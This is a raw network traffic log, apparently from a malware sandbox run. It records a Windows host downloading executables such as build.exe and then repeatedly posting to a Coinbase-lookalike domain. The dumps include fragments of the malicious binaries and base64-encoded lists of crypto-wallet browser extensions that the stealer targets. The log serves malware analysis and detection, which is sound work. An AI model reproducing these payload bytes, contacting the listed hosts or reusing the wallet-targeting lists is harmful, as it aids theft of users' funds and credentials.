Jul 6, 2024 13:27:24.518280029 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:24 GMT content-type: application/x-msdownload content-length: 64512 server: nginx last-modified: Wed, 03 Jul 2024 23:16:12 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 37 48 62 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 10 00 00 00 00 00 00 9e 09 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 09 01 00 53 00 00 00 00 20 01 00 f5 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL7Hb @ `@HS @ H.text `.rsrc @@.reloc@@BHehWH3W3./\(~~~~~~~~~~~**(C2~oDs%rpo(hrp(ooo( (s%rporpo%rpooo( Vssi~""F(+~!o&o^(4 [TRUNCATED]
Jul 6, 2024 13:27:24.518296957 CEST	1236	IN	Data Raw: 28 36 00 00 06 26 28 35 00 00 06 26 2a 5e 14 fe 06 2e 00 00 06 73 8f 00 00 0a 73 90 00 00 0a 80 21 00 00 04 2a 6e 28 39 00 00 06 3a 10 00 00 00 28 3a 00 00 06 39 06 00 00 00 14 28 93 00 00 0a 2a 3e 28 3d 00 00 06 8e 3a 02 00 00 00 16 2a 17 2a 42 Data Ascii: (6&(5&^.ss!n(9:(:9(>(=:B~-(>orps-rps.r'ps/V(s ozo>oYo*(S%~(9rp(sz(T
Jul 6, 2024 13:27:24.518307924 CEST	1236	IN	Data Raw: 28 a1 00 00 06 2a 22 02 03 28 ae 00 00 06 2a 1e 02 7b a1 01 00 04 2a 32 02 7b a3 01 00 04 73 88 00 00 06 2a 4a 02 73 69 00 00 0a 7d a3 01 00 04 02 28 1b 00 00 0a 2a 3a 02 6f 38 01 00 0a d2 02 28 c0 00 00 06 2a 32 02 20 c0 00 00 00 6f 26 01 00 0a Data Ascii: ("({2{sJsi}(:o8(2 o&j o&(oQ~ o&(5(oQz9 o& o&*0'8 (X~(2(:(~(
Jul 6, 2024 13:27:24.518389940 CEST	1236	IN	Data Raw: 49 11 00 70 80 12 00 00 04 72 fc 11 00 70 80 13 00 00 04 2a 00 1b 30 07 00 f1 02 00 00 04 00 00 11 18 17 1c 73 28 00 00 0a 25 20 00 c8 00 00 6f 29 00 00 0a 25 20 00 c8 00 00 6f 2a 00 00 0a 28 07 00 00 06 7e 0d 00 00 04 72 af 12 00 70 28 2b 00 00 Data Ascii: Iprp0s(% o)% o(~rp(+9~I%,o,s-~I%,o,io.~I%,o,s-~I%,o,io.((9R(/89B(
Jul 6, 2024 13:27:24.518400908 CEST	1236	IN	Data Raw: 00 06 16 6a 3c 0b 00 00 00 16 28 13 00 00 06 dd c6 00 00 00 28 0c 00 00 06 16 6a 30 98 14 fe 06 23 00 00 06 73 4b 00 00 0a 73 4c 00 00 0a 28 0a 00 00 06 6f 4d 00 00 0a 16 6a 28 0f 00 00 06 1a 6a 28 0d 00 00 06 28 0c 00 00 06 d4 8d 53 00 00 01 28 Data Ascii: j<((j0#sKsL(oMj(j((S(8:j((S(j(8(j<(E(((i(isAoB&8(&(*A
Jul 6, 2024 13:27:24.518412113 CEST	1236	IN	Data Raw: 00 a4 00 00 00 79 00 00 00 1d 01 00 00 0f 00 00 00 41 00 00 01 02 00 00 00 62 01 00 00 57 00 00 00 b9 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 01 00 00 cc 01 00 00 0f 00 00 00 41 00 00 01 13 30 0b 00 11 01 00 00 08 00 00 11 28 Data Ascii: yAbWA0(^rpoo(r(o_rQpo`(a~ : rmp(bd%(c%(c%(c%(c%(c%(c%(c%
Jul 6, 2024 13:27:24.518435001 CEST	1236	IN	Data Raw: 02 28 62 00 00 0a 28 91 00 00 0a 7d 23 00 00 04 06 12 01 28 32 00 00 06 39 f1 00 00 00 07 7b 25 00 00 04 0c 07 7b 2c 00 00 04 0d 09 72 41 15 00 70 28 2f 00 00 06 3a c0 00 00 00 09 72 59 15 00 70 28 2f 00 00 06 3a b0 00 00 00 09 72 7d 15 00 70 28 Data Ascii: (b(}#(29{%{,rAp(/:rYp(/:r}p(/:rp(/:rp(/:rp(/:prp(/:`rp(/:Prp(/:@r?p(/:0rYp(/: rqp(/:rp(/
Jul 6, 2024 13:27:24.518567085 CEST	1236	IN	Data Raw: 00 0a 16 1f 14 6f c1 00 00 0a 6f c2 00 00 0a 13 06 dd 0d 00 00 00 26 72 95 18 00 70 13 06 dd 00 00 00 00 11 06 2a 00 00 00 01 10 00 00 00 00 00 00 b5 b5 00 0d 01 00 00 01 13 30 07 00 d7 01 00 00 11 00 00 11 73 bd 00 00 06 25 72 bd 12 00 70 6f a8 Data Ascii: oo&rp*0s%rporpo%rpo~o%rpo(o=o%rpos(o=rporp((rprporprpo(o%rp
Jul 6, 2024 13:27:24.518578053 CEST	1236	IN	Data Raw: 26 dd 00 00 00 00 00 7e 7d 00 00 0a 72 99 1a 00 70 17 6f e1 00 00 0a 72 ab 1a 00 70 17 6f e1 00 00 0a 72 cb 1a 00 70 6f e2 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 28 00 00 00 00 00 00 36 36 00 06 01 00 00 01 00 00 3d 00 2a 67 00 06 01 Data Ascii: &~}rporporpo&(66=gn0h(moo8oto(:o'o-u@9o'~**<L0~
Jul 6, 2024 13:27:24.518589020 CEST	1236	IN	Data Raw: 0a 28 ec 00 00 0a 6a 58 28 eb 00 00 0a 28 ee 00 00 0a 03 1b 6f ef 00 00 0a 39 55 00 00 00 0f 00 28 ea 00 00 0a 11 09 6a 58 11 0a 18 5a 6a 58 28 eb 00 00 0a 28 ed 00 00 0a 11 05 58 13 0b 0f 00 28 ea 00 00 0a 11 07 6a 58 1a 11 0b 11 05 59 5a 6a 58 Data Ascii: (jX((o9U(jXZjX((X(jXYZjX(((jX(8X?b&r)psz~(9r)p(sz*A0sf}s
Jul 6, 2024 13:27:24.527977943 CEST	1236	IN	Data Raw: 1e 00 00 00 06 39 06 00 00 00 06 6f 27 00 00 0a dc 6f 58 00 00 0a 28 26 00 00 06 dd 00 00 00 00 16 2a 07 2a 00 01 1c 00 00 02 00 11 00 12 23 00 0d 00 00 00 00 00 00 00 00 30 30 00 0f 41 00 00 01 1b 30 03 00 5c 00 00 00 1d 00 00 11 02 28 1b 00 00 Data Ascii: 9o'oX(&*#00A0\((9rpsz~ Ps o}@o}9o'-!N0:rpszs joSs o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49764	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:24.902744055 CEST	140	OUT	GET /build.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:25.497742891 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:25 GMT content-type: application/x-msdownload content-length: 307712 server: nginx last-modified: Thu, 04 Jul 2024 00:04:16 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 02 03 00 57 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @4W H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1h [TRUNCATED]
Jul 6, 2024 13:27:25.497760057 CEST	1236	IN	Data Raw: 32 00 73 00 4b 00 59 00 57 00 5a 00 69 00 59 00 32 00 4a 00 71 00 63 00 47 00 4a 00 77 00 5a 00 6d 00 46 00 6b 00 62 00 47 00 74 00 74 00 61 00 47 00 31 00 6a 00 62 00 47 00 68 00 72 00 5a 00 57 00 56 00 76 00 5a 00 47 00 31 00 68 00 62 00 57 00 Data Ascii: 2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJ
Jul 6, 2024 13:27:25.497771025 CEST	448	IN	Data Raw: 6d 00 61 00 32 00 4e 00 69 00 5a 00 32 00 56 00 72 00 61 00 47 00 56 00 75 00 59 00 6d 00 68 00 38 00 51 00 58 00 52 00 76 00 62 00 57 00 6c 00 6a 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 35 00 73 00 59 00 6d 00 31 00 75 00 Data Ascii: ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkY
Jul 6, 2024 13:27:25.497788906 CEST	1236	IN	Data Raw: 72 00 61 00 32 00 46 00 69 00 62 00 6d 00 52 00 6a 00 62 00 6d 00 35 00 76 00 5a 00 32 00 46 00 6e 00 62 00 32 00 64 00 69 00 62 00 6d 00 56 00 6c 00 59 00 33 00 78 00 53 00 62 00 32 00 35 00 70 00 62 00 6c 00 64 00 68 00 62 00 47 00 78 00 6c 00 Data Ascii: ra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkc
Jul 6, 2024 13:27:25.497798920 CEST	1236	IN	Data Raw: 92 a7 07 f2 f0 f3 69 e2 a1 4e da f4 cd 65 05 be d5 06 34 62 1f d1 a6 fe 8a c4 2e 53 9d 34 f3 55 a0 a2 8a e1 32 05 f6 eb 75 a4 83 ec 39 0b 60 ef aa 40 71 9f 06 5e 6e 10 51 bd 21 8a f9 3e dd 06 3d 96 3e 05 ae dd e6 bd 46 4d 54 8d b5 91 c4 5d 05 71 Data Ascii: iNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y\|GB\|+H2pZrNl8V=-9'6d\!h[T6.:$gWO awKiZ*"C<
Jul 6, 2024 13:27:25.497808933 CEST	1236	IN	Data Raw: 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 00 00 00 00 00 00 a5 c6 63 63 84 f8 7c 7c 99 ee 77 77 8d f6 7b 7b 0d ff f2 f2 bd d6 6b 6b b1 de 6f 6f 54 91 c5 c5 50 60 30 30 03 02 01 01 a9 ce 67 67 7d 56 2b 2b 19 e7 fe fe 62 b5 d7 d7 e6 4d ab ab Data Ascii: sionId='cc\|\|ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~??O\h44Q4qqsSb11?*ReF##^(07
Jul 6, 2024 13:27:25.497823000 CEST	1236	IN	Data Raw: f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f 5f e7 15 92 9c 95 bf 6d 7a eb 95 52 59 da d4 be 83 2d 58 74 21 d3 49 e0 69 29 8e c9 c8 44 75 c2 89 6a f4 8e 79 78 99 58 3e 6b 27 b9 71 dd be e1 4f b6 f0 88 ad 17 c9 20 ac 66 7d ce 3a b4 63 df 4a 18 e5 1a 31 82 Data Ascii: Fk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU*(/{70(#j\+yNie4b4.SU2u9@`^qnQ>!=
Jul 6, 2024 13:27:25.497931957 CEST	328	IN	Data Raw: 0e 07 12 36 24 12 80 9b 1b 80 e2 3d df e2 eb 26 cd eb 27 69 4e 27 b2 cd 7f b2 75 9f ea 75 09 1b 12 09 83 9e 1d 83 2c 74 58 2c 1a 2e 34 1a 1b 2d 36 1b 6e b2 dc 6e 5a ee b4 5a a0 fb 5b a0 52 f6 a4 52 3b 4d 76 3b d6 61 b7 d6 b3 ce 7d b3 29 7b 52 29 Data Ascii: 6$=&'iN'uu,tX,.4-6nnZZ[RR;Mv;a}){R)>/q^/SSh, `@ y[[jjFg9Kr9JJLLXXJk*OCCMM3Uf3EEPP<Dx<%KQQ]@@?
Jul 6, 2024 13:27:25.497942924 CEST	1236	IN	Data Raw: fc 7e 3d 47 7a 3d 64 ac c8 64 5d e7 ba 5d 19 2b 32 19 73 95 e6 73 60 a0 c0 60 81 98 19 81 4f d1 9e 4f dc 7f a3 dc 22 66 44 22 2a 7e 54 2a 90 ab 3b 90 88 83 0b 88 46 ca 8c 46 ee 29 c7 ee b8 d3 6b b8 14 3c 28 14 de 79 a7 de 5e e2 bc 5e 0b 1d 16 0b Data Ascii: ~=Gz=dd]]+2ss``OO"fD"~T;FF)k<(y^^v;2Vd2:Nt:II$lH$\\]nCbb917yy2C7Yn7mmdNNIllVV%eezzGoxx%oJ%.r\.$8Ws
Jul 6, 2024 13:27:25.497991085 CEST	1236	IN	Data Raw: 6d 00 46 00 6c 00 62 00 47 00 31 00 76 00 62 00 57 00 56 00 70 00 62 00 57 00 68 00 73 00 63 00 47 00 31 00 6e 00 61 00 6d 00 35 00 71 00 62 00 33 00 42 00 6f 00 61 00 48 00 42 00 72 00 61 00 32 00 39 00 73 00 61 00 6e 00 42 00 68 00 66 00 46 00 Data Ascii: mFlbG1vbWVpbWhscG1nam5qb3BoaHBra29sanBhfFBoYW50b20KZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8T3h5Z2VuCm1nZmZrZmJpZGloanB
Jul 6, 2024 13:27:25.502677917 CEST	1236	IN	Data Raw: 47 00 56 00 70 00 62 00 57 00 64 00 73 00 61 00 57 00 64 00 75 00 5a 00 47 00 52 00 72 00 61 00 6d 00 64 00 76 00 5a 00 6d 00 74 00 6a 00 59 00 6d 00 64 00 6c 00 61 00 32 00 68 00 6c 00 62 00 6d 00 4a 00 6f 00 66 00 45 00 39 00 34 00 65 00 57 00 Data Ascii: GVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49766	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:26.055756092 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:26.063711882 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:26.785182953 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2BCn%2FL6fGrYn8oV55qhT3jLr6GVZxy9gbW28f9zI8RXepnqPqeEZsa6qHqFgc2MU9zLeHiRsjwwMFl5UAwcfvPG3wMMLNnkbiYVIm2GxSoxKfcH9UexM3MpHq71dlo%2BlUFN5r5eGk0ban2A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ede5b574386-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49769	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:26.898973942 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:26.903873920 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:27.769922972 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KrcZVTa5YrXn5ACndPQFuRblwRxwvwvRd1HbvQrwHu5fH%2F9MtznfYa3To4Rbno8RMIhB5NjIQKpWYlu5wryPwaT%2BQJXd%2Fbh8q9oThVxOdqhaa%2BvYWXDdSs%2BB%2BGe4l9XYYoKWwNPM8mJcklo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ee3c99c8c4b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49770	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:27.885797977 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:27.890707016 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:28.597379923 CEST	613	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOKVBafCVW9DAW0%2FTQ3IOGdJICYXNhroTY3xUS2brQt6GiIA5r42PkXdp04baO8FTksFCt3kMdKJS7E7UsmpfEK7Wp0DKS4lQltsYc8lrQHrskE47fjDiaY7YIAi2BtwqOXYhZmTt8GOQXo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ee9df950cae-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49772	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:28.711553097 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:28.716425896 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:29.420284986 CEST	627	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCsO3%2BcRCQamA5HMNmR5jjVlensKrcvQo4Ew0cR2e2hQ0VcPU9C9WA1F7zEQEKsj%2F%2F%2FLFKn6mhnsXthwLI521GDE1Zvhscj%2F8nztllQFyYHij9YZ%2FOcPspt3nJtJl1%2F35aGi0yMv%2BcEk4pA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3eef0ac87cfa-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49773	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:29.539773941 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:29.544754982 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:30.287144899 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5S1Kj2XuMJ521rnheCfUnKqM6Qnq2x0Ka1cxmGRu8Rg9RJUWdpyHMSL9H4cqfOiLbOan3jCNbAmtYnh3p8kr%2BP8UEcg4sIUwi37UYN029wWmZiEV1ljPFuYMVbzI5oMfgaYg0Zww%2BS56Ps8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ef46f4b41f3-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49775	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:30.555666924 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:30.560511112 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:31.268838882 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZAkZ8AcDGP6%2BSxVMrnZOWqLVZKdh53ngvHfGBMNKHrQyRwVwvAWZQ6mX3Ddwcg9wzJyvtSiOndS1sipEefIV%2BpQeO5Ek0NvCxhyMY6iNup%2B9B3ZcBFr5c72HUxaTbHjeCSoJBuMG9rWjx8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3efa7f507c7e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49778	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:31.385483027 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:31.391784906 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:32.114167929 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ujearrVHUinMeSWCC2KYylz60gcYdSY52ok3TYNi%2FprMZIK6M1PDOM%2B%2B0yJqSQx9puGdJTcLP9XBgxxRs1Cf4TpkX5nQyqWEv5u99j%2FeU05z6s0k8SxrVsp1TEvIZI9117GJd0xbCScS34%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3effcfc51831-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49781	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:32.392018080 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:32.399223089 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:33.134685040 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmGEHqEGREFo55RHuQ66nCdqanGKpm3pw4XfgogiS7gQ4%2Ft2TJMeppnCLesjpz2UHz%2B%2BzeWlKj5wDlY1Yql6Wtsia24AiIMHsB3e9GnYvY8gpShPwIM2tLl25Eim5f37gNrdUBWx%2BopICv4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f060faa7cf6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49782	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:33.258668900 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:33.263577938 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
